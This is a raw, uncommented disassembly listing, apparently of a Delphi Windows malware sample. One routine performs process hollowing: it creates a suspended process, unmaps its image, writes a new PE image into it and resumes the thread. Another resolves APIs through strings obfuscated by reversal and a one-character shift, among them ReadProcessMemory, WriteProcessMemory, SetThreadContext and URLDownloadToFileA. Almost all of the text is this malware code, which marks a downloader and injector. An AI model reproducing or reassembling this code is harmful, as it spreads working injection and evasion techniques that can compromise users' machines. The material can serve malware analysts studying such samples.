dword_404B8C dd 0FE3F19AAh, 0F0B60BE5h, 51A99BE3h, 0aTerminateproce db 'TerminateProcess',0 ; DATA XREF: sub_4046BC+310�o
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404BB0 proc near ; DATA XREF: CODE:00405988�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_404BD5
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4076A8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404BDC
loc_404BD4: ; CODE XREF: sub_404BB0+2A�j
retn
; ---------------------------------------------------------------------------
loc_404BD5: ; DATA XREF: sub_404BB0+6�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_404BD4
; ---------------------------------------------------------------------------
loc_404BDC: ; CODE XREF: sub_404BB0:loc_404BD4�j
; DATA XREF: sub_404BB0+1F�o
pop ebp
retn
sub_404BB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404BE0 proc near ; DATA XREF: CODE:00405984�o
sub ds:dword_4076A8, 1
retn
sub_404BE0 endp
; =============== S U B R O U T I N E =======================================
sub_404BE8 proc near ; CODE XREF: sub_404C00+184�p
lea edx, [eax+18h]
movzx eax, word ptr [eax+14h]
add edx, eax
mov eax, edx
retn
sub_404BE8 endp
; =============== S U B R O U T I N E =======================================
sub_404BF4 proc near ; CODE XREF: sub_404C00+1D2�p
shr eax, 1Dh
mov eax, ds:dword_4060A8[eax*4]
retn
sub_404BF4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404C00 proc near ; CODE XREF: CODE:00405B04�p
var_148 = dword ptr -148h
var_A4 = dword ptr -0A4h
var_98 = dword ptr -98h
var_7C = dword ptr -7Ch
var_4C = word ptr -4Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_21 = byte ptr -21h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFEB8h
push ebx
push esi
push edi
mov [ebp+var_C], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
call sub_4032E8
mov eax, [ebp+var_C]
call sub_4032E8
xor eax, eax
push ebp
push offset loc_404EA0
push dword ptr fs:[eax]
mov fs:[eax], esp
xor ebx, ebx
lea eax, [ebp+var_38]
xor ecx, ecx
mov edx, 10h
call sub_402790
lea eax, [ebp+var_7C]
xor ecx, ecx
mov edx, 44h
call sub_402790
mov [ebp+var_7C], 44h
xor eax, eax
mov al, [ebp+arg_0]
mov [ebp+var_4C], ax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_7C]
push eax
push 0
push 0
push 4
push 0
push 0
push 0
mov eax, [ebp+var_C]
call sub_4032F8
push eax
mov eax, [ebp+var_8]
call sub_4032F8
push eax
mov eax, ds:off_4060D8
mov eax, [eax]
call eax
test eax, eax
jz loc_404E85
mov [ebp+var_21], 1
xor eax, eax
push ebp
push offset loc_404E7E
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_148], 10002h
lea eax, [ebp+var_148]
push eax
mov eax, [ebp+var_34]
push eax
mov eax, ds:off_4060DC
mov eax, [eax]
call eax
test eax, eax
jz loc_404E49
lea eax, [ebp+var_14]
push eax
push 4
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+var_A4]
add eax, 8
push eax
mov eax, [ebp+var_38]
push eax
mov eax, ds:off_4060F4
mov eax, [eax]
call eax
test eax, eax
jz loc_404E49
mov eax, [ebp+var_10]
push eax
mov eax, [ebp+var_38]
push eax
mov eax, ds:off_4060D4
mov eax, [eax]
call eax
test eax, eax
jl loc_404E49
cmp [ebp+var_4], 0
jz loc_404E49
mov eax, [ebp+var_4]
mov eax, [eax+3Ch]
add eax, [ebp+var_4]
mov [ebp+var_20], eax
push 4
push 3000h
mov eax, [ebp+var_20]
mov eax, [eax+50h]
push eax
mov eax, [ebp+var_20]
mov eax, [eax+34h]
push eax
mov eax, [ebp+var_38]
push eax
mov eax, ds:off_4060E0
mov eax, [eax]
call eax
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz loc_404E49
lea eax, [ebp+var_18]
push eax
mov eax, [ebp+var_20]
mov eax, [eax+54h]
push eax
mov eax, [ebp+var_4]
push eax
mov eax, [ebp+var_10]
push eax
mov eax, [ebp+var_38]
push eax
mov eax, ds:off_4060D0
mov eax, [eax]
call eax
test eax, eax
jz loc_404E49
mov eax, [ebp+var_20]
call sub_404BE8
mov esi, eax
mov eax, [ebp+var_20]
movzx eax, word ptr [eax+6]
dec eax
test eax, eax
jb short loc_404DF8
inc eax
mov [ebp+var_28], eax
xor ebx, ebx
loc_404D9D: ; CODE XREF: sub_404C00+1F6�j
lea eax, [ebp+var_18]
push eax
lea edi, [ebx+ebx*4]
mov eax, [esi+edi*8+10h]
push eax
mov eax, [esi+edi*8+14h]
add eax, [ebp+var_4]
push eax
mov eax, [esi+edi*8+0Ch]
add eax, [ebp+var_10]
push eax
mov eax, [ebp+var_38]
push eax
mov eax, ds:off_4060D0
mov eax, [eax]
call eax
test eax, eax
jz short loc_404DF2
lea eax, [ebp+var_1C]
push eax
mov eax, [esi+edi*8+24h]
call sub_404BF4
push eax
mov eax, [esi+edi*8+8]
push eax
mov eax, [esi+edi*8+0Ch]
add eax, [ebp+var_10]
push eax
mov eax, [ebp+var_38]
push eax
mov eax, ds:off_4060F0
mov eax, [eax]
call eax
loc_404DF2: ; CODE XREF: sub_404C00+1C8�j
inc ebx
dec [ebp+var_28]
jnz short loc_404D9D
loc_404DF8: ; CODE XREF: sub_404C00+195�j
lea eax, [ebp+var_18]
push eax
push 4
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+var_A4]
add eax, 8
push eax
mov eax, [ebp+var_38]
push eax
mov eax, ds:off_4060D0
mov eax, [eax]
call eax
test eax, eax
jz short loc_404E49
mov eax, [ebp+var_20]
mov eax, [eax+28h]
add eax, [ebp+var_10]
mov [ebp+var_98], eax
lea eax, [ebp+var_148]
push eax
mov eax, [ebp+var_34]
push eax
mov eax, ds:off_406100
mov eax, [eax]
call eax
cmp eax, 1
sbb eax, eax
inc eax
mov [ebp+var_21], al
loc_404E49: ; CODE XREF: sub_404C00+CC�j
; sub_404C00+F5�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404E85
loc_404E56: ; CODE XREF: sub_404C00+283�j
cmp [ebp+var_21], 0
jnz short loc_404E6D
push 0
mov eax, [ebp+var_38]
push eax
mov eax, ds:off_4060FC
mov eax, [eax]
call eax
jmp short loc_404E7A
; ---------------------------------------------------------------------------
loc_404E6D: ; CODE XREF: sub_404C00+25A�j
mov eax, [ebp+var_34]
push eax
mov eax, ds:off_4060CC
mov eax, [eax]
call eax
loc_404E7A: ; CODE XREF: sub_404C00+26B�j
mov bl, [ebp+var_21]
retn
; ---------------------------------------------------------------------------
loc_404E7E: ; DATA XREF: sub_404C00+A1�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_404E56
; ---------------------------------------------------------------------------
loc_404E85: ; CODE XREF: sub_404C00+94�j
; DATA XREF: sub_404C00+251�o
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404EA7
loc_404E92: ; CODE XREF: sub_404C00+2A5�j
lea eax, [ebp+var_C]
mov edx, 2
call sub_40313C
retn
; ---------------------------------------------------------------------------
loc_404EA0: ; DATA XREF: sub_404C00+28�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_404E92
; ---------------------------------------------------------------------------
loc_404EA7: ; CODE XREF: sub_404C00+29F�j
; DATA XREF: sub_404C00+28D�o
mov eax, ebx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_404C00 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404EB4 proc near ; DATA XREF: CODE:00405990�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_404ED9
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4076AC
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404EE0
loc_404ED8: ; CODE XREF: sub_404EB4+2A�j
retn
; ---------------------------------------------------------------------------
loc_404ED9: ; DATA XREF: sub_404EB4+6�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_404ED8
; ---------------------------------------------------------------------------
loc_404EE0: ; CODE XREF: sub_404EB4:loc_404ED8�j
; DATA XREF: sub_404EB4+1F�o
pop ebp
retn
sub_404EB4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_404EE4 proc near ; DATA XREF: CODE:0040598C�o
sub ds:dword_4076AC, 1
retn
sub_404EE4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404EEC proc near ; DATA XREF: CODE:00405998�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_404F11
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4076B0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404F18
loc_404F10: ; CODE XREF: sub_404EEC+2A�j
retn
; ---------------------------------------------------------------------------
loc_404F11: ; DATA XREF: sub_404EEC+6�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_404F10
; ---------------------------------------------------------------------------
loc_404F18: ; CODE XREF: sub_404EEC:loc_404F10�j
; DATA XREF: sub_404EEC+1F�o
pop ebp
retn
sub_404EEC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_404F1C proc near ; DATA XREF: CODE:00405994�o
sub ds:dword_4076B0, 1
retn
sub_404F1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F24 proc near ; DATA XREF: CODE:004059A0�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_404F49
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4076B4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404F50
loc_404F48: ; CODE XREF: sub_404F24+2A�j
retn
; ---------------------------------------------------------------------------
loc_404F49: ; DATA XREF: sub_404F24+6�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_404F48
; ---------------------------------------------------------------------------
loc_404F50: ; CODE XREF: sub_404F24:loc_404F48�j
; DATA XREF: sub_404F24+1F�o
pop ebp
retn
sub_404F24 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_404F54 proc near ; DATA XREF: CODE:0040599C�o
sub ds:dword_4076B4, 1
retn
sub_404F54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F5C proc near ; DATA XREF: CODE:004059A8�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_404F81
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4076B8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404F88
loc_404F80: ; CODE XREF: sub_404F5C+2A�j
retn
; ---------------------------------------------------------------------------
loc_404F81: ; DATA XREF: sub_404F5C+6�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_404F80
; ---------------------------------------------------------------------------
loc_404F88: ; CODE XREF: sub_404F5C:loc_404F80�j
; DATA XREF: sub_404F5C+1F�o
pop ebp
retn
sub_404F5C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_404F8C proc near ; DATA XREF: CODE:004059A4�o
sub ds:dword_4076B8, 1
retn
sub_404F8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F94 proc near ; CODE XREF: sub_405018+2D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
xor ecx, ecx
mov [ebp+var_8], ecx
mov esi, edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_4032E8
xor eax, eax
push ebp
push offset loc_405008
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
call sub_40329C
mov edi, eax
cmp edi, 1
jl short loc_404FED
loc_404FCC: ; CODE XREF: sub_404F94+57�j
mov eax, [ebp+var_4]
mov bl, [eax+edi-1]
lea eax, [ebp+var_8]
mov edx, ebx
inc edx
call sub_403238
mov edx, [ebp+var_8]
mov eax, esi
call sub_4032A4
dec edi
test edi, edi
jnz short loc_404FCC
loc_404FED: ; CODE XREF: sub_404F94+36�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40500F
loc_404FFA: ; CODE XREF: sub_404F94+79�j
lea eax, [ebp+var_8]
mov edx, 2
call sub_40313C
retn
; ---------------------------------------------------------------------------
loc_405008: ; DATA XREF: sub_404F94+1E�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_404FFA
; ---------------------------------------------------------------------------
loc_40500F: ; CODE XREF: sub_404F94+73�j
; DATA XREF: sub_404F94+61�o
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_404F94 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405018 proc near ; CODE XREF: sub_4050C0+34�p
; sub_4050C0+51�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
xor ecx, ecx
mov [ebp+var_8], ecx
mov ebx, edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_4032E8
xor eax, eax
push ebp
push offset loc_405081
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_8]
mov eax, [ebp+var_4]
call sub_404F94
mov edx, [ebp+var_8]
lea eax, [ebp+var_4]
call sub_4031B0
mov eax, [ebp+var_4]
call sub_4032F8
mov edx, eax
mov eax, ebx
call sub_403248
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_405088
loc_405073: ; CODE XREF: sub_405018+6E�j
lea eax, [ebp+var_8]
mov edx, 2
call sub_40313C
retn
; ---------------------------------------------------------------------------
loc_405081: ; DATA XREF: sub_405018+1C�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_405073
; ---------------------------------------------------------------------------
loc_405088: ; CODE XREF: sub_405018+68�j
; DATA XREF: sub_405018+56�o
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_405018 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405090 proc near ; DATA XREF: CODE:004059B0�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_4050B5
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_407730
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4050BC
loc_4050B4: ; CODE XREF: sub_405090+2A�j
retn
; ---------------------------------------------------------------------------
loc_4050B5: ; DATA XREF: sub_405090+6�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_4050B4
; ---------------------------------------------------------------------------
loc_4050BC: ; CODE XREF: sub_405090:loc_4050B4�j
; DATA XREF: sub_405090+1F�o
pop ebp
retn
sub_405090 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4050C0 proc near ; DATA XREF: CODE:004059AC�o
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov ecx, 10h
loc_4050C8: ; CODE XREF: sub_4050C0+D�j
push 0
push 0
dec ecx
jnz short loc_4050C8
push ecx
push ebx
xor eax, eax
push ebp
push offset loc_405541
push dword ptr fs:[eax]
mov fs:[eax], esp
sub ds:dword_407730, 1
jnb loc_405523
lea edx, [ebp+var_4]
mov eax, offset dword_405558
call sub_405018
mov eax, [ebp+var_4]
call sub_4032F8
push eax
call sub_403DF4 ; LoadLibraryA
mov ebx, eax
lea edx, [ebp+var_8]
mov eax, offset dword_405570
call sub_405018
mov eax, [ebp+var_8]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_4076D8, eax
lea edx, [ebp+var_C]
mov eax, offset aXqnldlrrdbnqoc ; "xqnldLrrdbnqOc`dQ"
call sub_405018
mov eax, [ebp+var_C]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_4076DC, eax
lea edx, [ebp+var_10]
mov eax, offset aXqnldlrrdbnqod ; "xqnldLrrdbnqOdshqV"
call sub_405018
mov eax, [ebp+var_10]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_4076BC, eax
lea edx, [ebp+var_14]
mov eax, offset aSwdsmnbcDqgssd ; "swdsmnBc`dqgSsdF"
call sub_405018
mov eax, [ebp+var_14]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_4076E0, eax
lea edx, [ebp+var_18]
mov eax, offset aSwdsmnbcDqgs_0 ; "swdsmnBc`dqgSsdR"
call sub_405018
mov eax, [ebp+var_18]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_4076D4, eax
lea edx, [ebp+var_1C]
mov eax, offset dword_4055F8
call sub_405018
mov eax, [ebp+var_1C]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_4076E4, eax
lea edx, [ebp+var_20]
mov eax, offset dword_405610
call sub_405018
mov eax, [ebp+var_20]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_4076E8, eax
lea edx, [ebp+var_24]
mov eax, offset dword_405628
call sub_405018
mov eax, [ebp+var_24]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_4076C0, eax
lea edx, [ebp+var_28]
mov eax, offset aDbqtnrdqendyhr ; "dbqtnrdQendyhR"
call sub_405018
mov eax, [ebp+var_28]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_4076C4, eax
lea edx, [ebp+var_2C]
mov eax, offset dword_405658
call sub_405018
mov eax, [ebp+var_2C]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_4076C8, eax
lea edx, [ebp+var_30]
mov eax, offset aDbqtnrdqjbnk ; "dbqtnrdQjbnK"
call sub_405018
mov eax, [ebp+var_30]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_4076CC, eax
lea edx, [ebp+var_34]
mov eax, offset aDbqtnrdqddqe ; "dbqtnrdQddqE"
call sub_405018
mov eax, [ebp+var_34]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_4076D0, eax
lea edx, [ebp+var_38]
mov eax, offset a@rdlMdbqtnrdql ; "@rdl`MdbqtnrdQltmD"
call sub_405018
mov eax, [ebp+var_38]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_4076EC, eax
lea edx, [ebp+var_3C]
mov eax, offset a@xqnsbdqhcldsr ; "@xqnsbdqhCldsrxRsdF"
call sub_405018
mov eax, [ebp+var_3C]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_4076F0, eax
lea edx, [ebp+var_40]
mov eax, offset dword_4056D8
call sub_405018
mov eax, [ebp+var_40]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_4076F4, eax
lea edx, [ebp+var_44]
mov eax, offset a@xqnsbdqhcrvnc ; "@xqnsbdqhCrvncmhVsdF"
call sub_405018
mov eax, [ebp+var_44]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_4076F8, eax
lea edx, [ebp+var_48]
mov eax, offset aDcnlqnqqdsdr ; "dcnLqnqqDsdR"
call sub_405018
mov eax, [ebp+var_48]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_4076FC, eax
lea edx, [ebp+var_4C]
mov eax, offset a@dmhkcmLlnbsdf ; "@dmhKcm`llnBsdF"
call sub_405018
mov eax, [ebp+var_4C]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_407700, eax
lea edx, [ebp+var_50]
mov eax, offset dword_405740
call sub_405018
mov eax, [ebp+var_50]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_407704, eax
lea edx, [ebp+var_54]
mov eax, offset dword_405754
call sub_405018
mov eax, [ebp+var_54]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_407708, eax
lea edx, [ebp+var_58]
mov eax, offset dword_405768
call sub_405018
mov eax, [ebp+var_58]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_40770C, eax
lea edx, [ebp+var_5C]
mov eax, offset aDkhedshqv ; "dkhEdshqV"
call sub_405018
mov eax, [ebp+var_5C]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_407710, eax
lea edx, [ebp+var_60]
mov eax, offset dword_405790
call sub_405018
mov eax, [ebp+var_60]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_407714, eax
lea edx, [ebp+var_64]
mov eax, offset aQdsmhnodkhesdr ; "qdsmhnOdkhEsdR"
call sub_405018
mov eax, [ebp+var_64]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_407718, eax
lea edx, [ebp+var_68]
mov eax, offset dword_4057BC
call sub_405018
mov eax, [ebp+var_68]
call sub_4032F8
push eax
call sub_403DF4 ; LoadLibraryA
mov ebx, eax
lea edx, [ebp+var_6C]
mov eax, offset aRsrhwdgsOxqnsb ; "rsrhwDgs`OxqnsbdqhCdqtRdj`L"
call sub_405018
mov eax, [ebp+var_6C]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_40771C, eax
lea edx, [ebp+var_70]
mov eax, offset dword_4057F8
call sub_405018
mov eax, [ebp+var_70]
call sub_4032F8
push eax
call sub_403DF4 ; LoadLibraryA
mov ebx, eax
lea edx, [ebp+var_74]
mov eax, offset dword_40580C
call sub_405018
mov eax, [ebp+var_74]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_407720, eax
lea edx, [ebp+var_78]
mov eax, offset a@dkaStbdwdcmhe ; "@dka`stbdwDcmhE"
call sub_405018
mov eax, [ebp+var_78]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_407724, eax
lea edx, [ebp+var_7C]
mov eax, offset a@gsOqdcknekHbd ; "@gs`OqdcknEk`hbdoRsdFGR"
call sub_405018
mov eax, [ebp+var_7C]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_407728, eax
lea edx, [ebp+var_80]
mov eax, offset dword_40585C
call sub_405018
mov eax, [ebp+var_80]
call sub_4032F8
push eax
call sub_403DF4 ; LoadLibraryA
mov ebx, eax
lea edx, [ebp+var_84]
mov eax, offset a@dkhenscNkmvnc ; "@dkhEnSc`nkmvnCKQT"
call sub_405018
mov eax, [ebp+var_84]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov ds:dword_40772C, eax
loc_405523: ; CODE XREF: sub_4050C0+26�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_405548
loc_405530: ; CODE XREF: sub_4050C0+486�j
lea eax, [ebp+var_84]
mov edx, 21h
call sub_40313C
retn
; ---------------------------------------------------------------------------
loc_405541: ; DATA XREF: sub_4050C0+14�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_405530
; ---------------------------------------------------------------------------
loc_405548: ; CODE XREF: sub_4050C0+480�j
; DATA XREF: sub_4050C0+46B�o
pop ebx
mov esp, ebp
pop ebp
retn
sub_4050C0 endp
; ---------------------------------------------------------------------------
align 10h
dd 0FFFFFFFFh, 0Ch
dword_405558 dd 2D636B6Bh, 646B3231h, 6A64716Dh, 0 dd 0FFFFFFFFh, 0Ch
dword_405570 dd 71646063h, 6C645367h, 51647274h, 0 dd 0FFFFFFFFh, 11h
aXqnldlrrdbnqoc db 'xqnldLrrdbnqOc`dQ',0 ; DATA XREF: sub_4050C0+6D�o
align 4
dd 0FFFFFFFFh, 12h
aXqnldlrrdbnqod db 'xqnldLrrdbnqOdshqV',0 ; DATA XREF: sub_4050C0+8E�o
align 4
dd 0FFFFFFFFh, 10h
aSwdsmnbcDqgssd db 'swdsmnBc`dqgSsdF',0 ; DATA XREF: sub_4050C0+AF�o
align 4
dd 0FFFFFFFFh, 10h
aSwdsmnbcDqgs_0 db 'swdsmnBc`dqgSsdR',0 ; DATA XREF: sub_4050C0+D0�o
align 10h
dd 0FFFFFFFFh, 0Eh
dword_4055F8 dd 64727240h, 4F716E62h, 64607364h, 4271h, 0FFFFFFFFh
; DATA XREF: sub_4050C0+F1�o
dd 0Eh
dword_405610 dd 6E624477h, 6B406B6Bh, 71737460h, 5568h, 0FFFFFFFFh
; DATA XREF: sub_4050C0+112�o
dd 0Dh
dword_405628 dd 71626440h, 64726E74h, 686D6351h, 45h, 0FFFFFFFFh, 0Eh
; DATA XREF: sub_4050C0+133�o
aDbqtnrdqendyhr db 'dbqtnrdQendyhR',0 ; DATA XREF: sub_4050C0+154�o
align 10h
dd 0FFFFFFFFh, 0Ch
dword_405658 dd 74716264h, 5164726Eh, 4B6E6063h, 0 dd 0FFFFFFFFh, 0Ch
aDbqtnrdqjbnk db 'dbqtnrdQjbnK',0 ; DATA XREF: sub_4050C0+196�o
align 10h
dd 0FFFFFFFFh, 0Ch
aDbqtnrdqddqe db 'dbqtnrdQddqE',0 ; DATA XREF: sub_4050C0+1B7�o
align 4
dd 0FFFFFFFFh, 12h
a@rdlMdbqtnrdql db '@rdl`MdbqtnrdQltmD',0 ; DATA XREF: sub_4050C0+1D8�o
align 4
dd 0FFFFFFFFh, 13h
a@xqnsbdqhcldsr db '@xqnsbdqhCldsrxRsdF',0 ; DATA XREF: sub_4050C0+1F9�o
dd 0FFFFFFFFh, 0Ch
dword_4056D8 dd 60736740h, 646C6F4Fh, 46647353h, 0 dd 0FFFFFFFFh, 14h
a@xqnsbdqhcrvnc db '@xqnsbdqhCrvncmhVsdF',0 ; DATA XREF: sub_4050C0+23B�o
align 4
dd 0FFFFFFFFh, 0Ch
aDcnlqnqqdsdr db 'dcnLqnqqDsdR',0 ; DATA XREF: sub_4050C0+25C�o
align 10h
dd 0FFFFFFFFh, 0Fh
a@dmhkcmLlnbsdf db '@dmhKcm`llnBsdF',0 ; DATA XREF: sub_4050C0+27D�o
dd 0FFFFFFFFh, 0Bh
dword_405740 dd 686B6440h, 64736445h, 43646Bh, 0FFFFFFFFh, 0Bh
; DATA XREF: sub_4050C0+29E�o
dword_405754 dd 686B6440h, 60736445h, 427164h, 0FFFFFFFFh, 8dword_405768 dd 45686B64h, 51646063h, 0 dd 0FFFFFFFFh, 9
aDkhedshqv db 'dkhEdshqV',0 ; DATA XREF: sub_4050C0+301�o
align 4
dd 0FFFFFFFFh, 0Bh
dword_405790 dd 6D636B64h, 72644760h, 426B6Eh, 0FFFFFFFFh, 0Eh
; DATA XREF: sub_4050C0+322�o
aQdsmhnodkhesdr db 'qdsmhnOdkhEsdR',0 ; DATA XREF: sub_4050C0+343�o
align 4
dd 0FFFFFFFFh, 0Ch
dword_4057BC dd 2D636B6Bh, 64676B6Fh, 686C6066h, 0 dd 0FFFFFFFFh, 1Bh
aRsrhwdgsOxqnsb db 'rsrhwDgs`OxqnsbdqhCdqtRdj`L',0 ; DATA XREF: sub_4050C0+381�o
dd 0FFFFFFFFh, 0Bh
dword_4057F8 dd 2D636B6Bh, 6B6B3231h, 726764h, 0FFFFFFFFh, 0Dh
; DATA XREF: sub_4050C0+3A2�o
dword_40580C dd 74736440h, 44776462h, 67646B6Bh, 52h, 0FFFFFFFFh, 0Fh
; DATA XREF: sub_4050C0+3BF�o
a@dkaStbdwdcmhe db '@dka`stbdwDcmhE',0 ; DATA XREF: sub_4050C0+3E0�o
dd 0FFFFFFFFh, 17h
